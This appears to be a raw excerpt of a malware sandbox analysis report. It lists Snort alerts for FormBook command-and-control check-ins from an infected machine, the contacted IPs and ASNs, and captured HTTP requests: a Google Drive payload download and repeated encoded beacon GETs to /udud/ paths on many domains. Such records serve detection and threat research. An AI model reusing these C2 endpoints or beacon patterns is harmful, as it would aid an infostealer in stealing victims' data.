        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49888 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49889 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49891 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49892 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49893 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49895 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49896 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49897 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49899 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49900 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49901 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49903 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49904 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49905 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49907 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49908 -> 116.203.164.244:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49909 -> 116.203.164.244:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49911 -> 116.203.164.244:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49912 -> 185.215.4.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49913 -> 185.215.4.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49915 -> 185.215.4.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49920 -> 76.223.67.189:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49921 -> 76.223.67.189:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49923 -> 76.223.67.189:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49924 -> 208.112.85.150:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49925 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49926 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49927 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49928 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49929 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49930 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49931 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49932 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49933 -> 185.253.215.17:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49934 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49936 -> 208.112.85.150:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49937 -> 208.112.85.150:80
        Source: Joe Sandbox ViewIP Address: 208.112.85.150 208.112.85.150
        Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
        Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
        Source: Joe Sandbox ViewASN Name: LNH-INCUS LNH-INCUS
        Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
        Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
        Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.avocatmh.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.lm2ue.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.noispisok.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.uhahiq.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE= HTTP/1.1Host: www.wp-bits.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF HTTP/1.1Host: www.academynadpo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA= HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
